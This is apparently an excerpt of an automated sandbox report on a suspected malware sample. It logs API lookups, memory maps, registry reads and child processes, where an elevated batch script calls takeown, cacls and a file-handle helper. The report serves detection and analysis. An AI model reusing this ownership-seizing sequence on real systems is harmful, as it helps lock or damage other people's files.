| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:24 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #49: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:11, Reason: Child Process |
| Unmonitor | End Time: 00:03:20, Reason: Self Terminated |
| Monitor Duration | 00:01:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x858 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BAC
0x
FC0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000590000 | 0x00590000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0059ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x00723fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x00730fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x00741fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ce0000 | 0x05016fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7f0affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0b0000 | 0x7f0b0000 | 0x7f0d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0d5000 | 0x7f0d5000 | 0x7f0d5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0d8000 | 0x7f0d8000 | 0x7f0dafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0db000 | 0x7f0db000 | 0x7f0dbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0dd000 | 0x7f0dd000 | 0x7f0dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 112 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xdf8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xd7c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xcdc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Workflow.Targets" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Workflow.Targets" |
|
1 |
Process #50: g13k6qzj64.exe
562
0
| Information | Value |
|---|---|
| ID | #50 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe |
| Command Line | G13k6QZj.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:11, Reason: Child Process |
| Unmonitor | End Time: 00:02:39, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd80 |
| Parent PID | 0xfc4 (c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D90
0x
D98
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00346fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00350fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x01bfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c00000 | 0x01c00000 | 0x01d06fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01daffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fab0000 | 0x7fab0000 | 0x7fab0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffe000 | 0x7ff5ffffe000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ff8d66c0000 | 0x7ff8d6769fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ff8e9500000 | 0x7ff8e9577fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
